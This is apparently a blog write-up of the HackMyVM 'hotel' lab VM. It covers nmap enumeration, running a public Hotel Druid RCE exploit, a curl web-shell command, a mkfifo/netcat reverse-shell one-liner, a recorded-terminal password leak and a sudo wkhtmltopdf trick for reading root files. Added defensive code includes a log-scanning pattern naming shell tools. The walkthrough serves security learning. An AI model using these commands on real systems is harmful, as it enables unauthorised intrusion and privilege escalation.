Background
The free CTF challenge website hackmyvm.eu has another easy-level VM called ‘hotel’ for us to download, enumerate and pull some flags from. Although it is marked as easy, I did have some trouble with one tricky part. Even so, I thoroughly enjoyed this challenge. Below you will find my write-up and the process I followed.
So let’s get into it.
Setup and Enumeration
The vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.
For the enumeration of the hackmyvm hotel challenge I will be using the BlackArch system build that I created in a previous blog post. You can use Kali, BlackArch, Parrot or just a standard Linux install to proceed.
As usual, nmap is the tool to scan everything with.
nmap -p- -T5 192.168.186.22
This finds an HTTP server running on port 80.
Let’s look a bit closer at this HTTP service and enumerate it some more.
nmap -sV -sC -p 80 192.168.186.22
- -sV for service detection and -sC for default scripts.
So nmap revealed something called Hotel Druid. Opening it up in Firefox shows something I have not come across before.
Investigating the software
It’s an open-source hotel-room booking application called Hotel Druid.
I will take a guess that it has a security hole that will allow me to somehow gain a foothold. The best place to check for known exploits for a piece of software is exploit-db.
A search for Hotel Druid exploits shows that there is indeed a remote code execution (RCE) vulnerability, and these are among the worst kind. There is also a downloadable exploit written in Python which we can use.
Have a read of the exploit and download it to the system you are enumerating from.
Finding a foothold
Run the script against the IP address of the VM. In my case it’s 192.168.186.22, but it will be different for you depending on your VirtualBox setup.
python ./druid_exploit.py -t http://192.168.186.22 --noauth
After executing the script I can see that it abuses the new-room function in Hotel Druid to create an RCE exploit, which lets us run a command via a URL on the system. I have run this via Firefox a few times and it does work. However, when creating the reverse shell it seems to be more reliable to do it with a “curl” command, so I will proceed with that.
curl "http://192.168.186.22/dati/selectappartamenti.php?cmd=whoami"
After the command “whoami” ran successfully, I can move on to the next stage and get a reverse shell.
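The web shell planted by the script is reached with a plain GET request carrying a “cmd” parameter, which is exactly what a defender would look for in the web server’s access log. The following is an added example, not code from this post or from Hotel Druid: it scans Apache-style combined log lines for query parameters whose percent-decoded value looks like a shell command. The log lines are constructed for the example (the /dati/selectappartamenti.php path is the one shown above; the benign page=3 request, the timestamps and the IP addresses are made up), and the token list is a starting point, not a complete signature.

```python
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" access-log line: we only need client IP, timestamp, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Shell metacharacters and a few binaries that rarely belong in a booking-app query string.
SUSPICIOUS = re.compile(
    r"[;|&`]|\$\(|/bin/(?:ba)?sh|\b(?:mkfifo|whoami|uname|wget|curl|nc|python3?)\b"
)


@dataclass
class Finding:
    ip: str
    timestamp: str
    path: str
    param: str
    value: str      # query value after percent-decoding
    status: int


def scan_access_log(text: str) -> List[Finding]:
    """Return one Finding per request whose decoded query value matches SUSPICIOUS."""
    findings: List[Finding] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # blank or non-standard line; a real tool would count these separately
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes values and turns '+' into spaces, so encoded payloads are caught too.
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            if SUSPICIOUS.search(value):
                findings.append(Finding(m["ip"], m["ts"], parts.path, param, value, int(m["status"])))
    return findings


# Constructed sample log (not a real capture); only the .php path comes from the write-up.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2020:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Oct/2020:13:55:40 +0000] "GET /dati/selectappartamenti.php?cmd=whoami HTTP/1.1" 200 12 "-" "curl/7.72.0"
192.0.2.10 - - [10/Oct/2020:13:56:02 +0000] "GET /dati/selectappartamenti.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff HTTP/1.1" 200 0 "-" "curl/7.72.0"
192.0.2.11 - - [10/Oct/2020:13:57:00 +0000] "GET /index.php?page=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.timestamp} {f.ip} {f.path} {f.param}={f.value!r} (HTTP {f.status})")
```

Matching on the decoded value rather than on the raw URL is the important design choice: the third request above hides its “;” behind %3B and would slip past a naive substring search on the log line.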
Reverse Shell
In order to get a reverse shell, I need to break this down into two parts.
- Run the command that will spawn a reverse shell.
- Run a “netcat” listener so we can catch the reverse shell.
Open two terminal windows; in the first one we have to have “netcat” running.
nc -vlnp 1234
In the second terminal we will use “curl” to spawn the reverse shell. Now I had some issues with this when just using the raw command to spawn a shell, and I had to URL-encode the command in “burpsuite”. After encoding I was able to move forward.
Below is the command to create a reverse shell, using the IP address of my enumeration system where I am running “netcat“.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.186.150 1234 >/tmp/f
So copy and paste all of that into your second terminal.
All going well, on your first terminal where “netcat” was listening you should now have a reverse shell. Now the shell needs to be stabilised, as a newly spawned reverse shell does not behave like a normal shell. We need to do some work to convert it into something usable.
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg
Now we have a usable bash shell that behaves as we expect.
More Enumeration
Now this is where I got stuck for a few hours. It took me a while to track down the next step; finally I got lucky and figured it out. There was a small element of a puzzle about this step.
After some time enumerating the system I found some points of interest.
- /etc/passwd has a user that can log in called “person”.
- The user “person” owns all the files that run the Hotel Druid software.
- There is a strange file called /var/www/html/ttylog.
- I ran LinPEAS against the system and found no useful exploits.
- There is a file in the “person” user’s home directory called /home/person/user.txt.
Reviewing our findings
So based on the above I have some points to focus on.
The file “/home/person/user.txt” is, I presume, the user flag. But the permissions are tight and it doesn’t allow my reverse shell to read it ‘yet’.
The file that looked out of place, “/var/www/html/ttylog”, was unusual. Running “file” on it reported a data file, and when I tried to run “strings” on it I found that “strings” was not installed on the VM, so I had to copy the file to my BlackArch system. Once copied I could run “strings” on it.
Ok! Looking at the output from “strings“, this file is definitely something to do with the “person” user, but what is the file? I puzzled over this one for a while and after some googling I found success. It was actually the output from a tool called ttyrec, a tool I had no knowledge of. Once I got this far it was easy to play the file back, as the tool to replay these files, “ttyplay”, was already installed on the VM. I will show the command but not the output. I have to leave you something to do!
ttyplay /var/www/html/ttylog
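A ttyrec recording is just a sequence of records, each a 12-byte little-endian header (seconds, microseconds, payload length) followed by the raw bytes that were written to the terminal, which is why “file” only sees data while “strings” still turns up readable fragments. The parser below is an added example, not part of this write-up or of the ttyrec/ttyplay tools: it reads such a file offline, rebuilds the on-screen text with terminal escape sequences stripped, and reports the session length, so a stray recording found in a web root can be triaged without replaying it on the box. The sample recording is constructed inside the block (the prompt, the DB_PASS variable and its value are made up); the real file from the VM is not included.

```python
import re
import struct
from dataclasses import dataclass
from typing import Iterator, List, Tuple

# ttyrec on-disk header: tv_sec, tv_usec, len as three little-endian 32-bit unsigned ints.
HEADER = struct.Struct("<III")

# Control sequences a terminal would have rendered (colours, cursor moves, window titles) rather than printed.
ANSI_RE = re.compile(rb"\x1b\[[0-9;?]*[ -/]*[@-~]|\x1b\][^\x07]*\x07")


@dataclass
class Record:
    timestamp: float   # seconds since the epoch, with microseconds
    data: bytes        # raw bytes written to the terminal


def iter_records(blob: bytes) -> Iterator[Record]:
    """Walk the records in a ttyrec blob; raise ValueError on a truncated or padded file."""
    off = 0
    while off + HEADER.size <= len(blob):
        sec, usec, length = HEADER.unpack_from(blob, off)
        off += HEADER.size
        if off + length > len(blob):
            raise ValueError(f"record at offset {off - HEADER.size} runs past end of file")
        yield Record(sec + usec / 1_000_000, blob[off:off + length])
        off += length
    if off != len(blob):
        raise ValueError(f"{len(blob) - off} trailing byte(s) after the last record")


def is_well_formed(blob: bytes) -> bool:
    """True when every record parses cleanly, i.e. the copy was not cut short."""
    try:
        for _ in iter_records(blob):
            pass
        return True
    except ValueError:
        return False


def transcript(blob: bytes) -> str:
    """Reconstruct what was visible on screen, minus escape sequences and CR/LF noise."""
    raw = b"".join(r.data for r in iter_records(blob))
    text = ANSI_RE.sub(b"", raw).decode("utf-8", errors="replace")
    return text.replace("\r\n", "\n").replace("\r", "\n")


def session_summary(blob: bytes) -> Tuple[int, float]:
    """(number of records, wall-clock duration in seconds) for a recording."""
    recs = list(iter_records(blob))
    if not recs:
        return 0, 0.0
    return len(recs), recs[-1].timestamp - recs[0].timestamp


def build_ttyrec(chunks: List[Tuple[float, bytes]]) -> bytes:
    """Serialise (timestamp, bytes) pairs in ttyrec format; used here only to construct a sample."""
    out = bytearray()
    for ts, data in chunks:
        sec = int(ts)
        usec = int(round((ts - sec) * 1_000_000))
        out += HEADER.pack(sec, usec, len(data)) + data
    return bytes(out)


# Constructed sample recording: a shell session where a secret was typed on the command line.
SAMPLE = build_ttyrec([
    (1600000000.0, b"person@hotel:~$ "),
    (1600000002.5, b"export DB_PASS=constructed-secret\r\n"),
    (1600000003.0, b"\x1b[32mperson@hotel\x1b[0m:~$ exit\r\n"),
])

if __name__ == "__main__":
    count, seconds = session_summary(SAMPLE)
    print(f"{count} records, {seconds:.1f}s of session")
    print(transcript(SAMPLE))
```

Call is_well_formed first on a file found in the wild: a copy that was cut short (for example by an interrupted transfer) fails at its last record, and the transcript of a partial file would otherwise raise halfway through.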
Getting the user flag
So now we have the password for the person user. We can log in, or run “su - person” on our reverse shell and enter the revealed password. The file /home/person/user.txt can now be read and entered into the hackmyvm hotel website for validation.
cat /home/person/user.txt
Getting the root flag
Now for some enumeration as the “person” user. One of the first commands to run when enumerating a user account is “sudo -l“. This gives us some interesting output.
sudo -l
So the output of “sudo -l” shows that the command “wkhtmltopdf” can be run with root permissions. “wkhtmltopdf” is a command that, contrary to its name, can convert most text files to PDF files. Due to the sudo permissions it can turn any file owned by root into a PDF as well. Taking a guess based on the name of the user flag, I can surmise that the root flag is /root/root.txt, so by running the command below I can read the root flag into a PDF file.
wkhtmltopdf /root/root.txt /tmp/root.pdf
Now all that’s left is to copy the file to your local enumeration system and open it with a PDF viewer.
Well done, now you have the root flag and you can verify it on the hackmyvm hotel website.
Conclusion
I enjoyed this CTF challenge a lot as it was fun to enumerate and capture the flags. For learners this type of CTF is perfect as it forces the basics of enumeration (nmap) and makes the challenger go online and do some research to find exploits. To me this is exactly what’s required for new learners so they can progress in this sport. I am not such a big fan of puzzle-type CTF challenges, and even though this one had some elements of puzzles, there was lots of learning in between and it was a great balance. Well done to the author.
It was not clear to me if a root shell is required, but I managed to capture all the flags without it. Leave a comment below if you think a root shell is absolutely required or just nice to have.
I hope you enjoyed my write-up of the “hackmyvm hotel” challenge.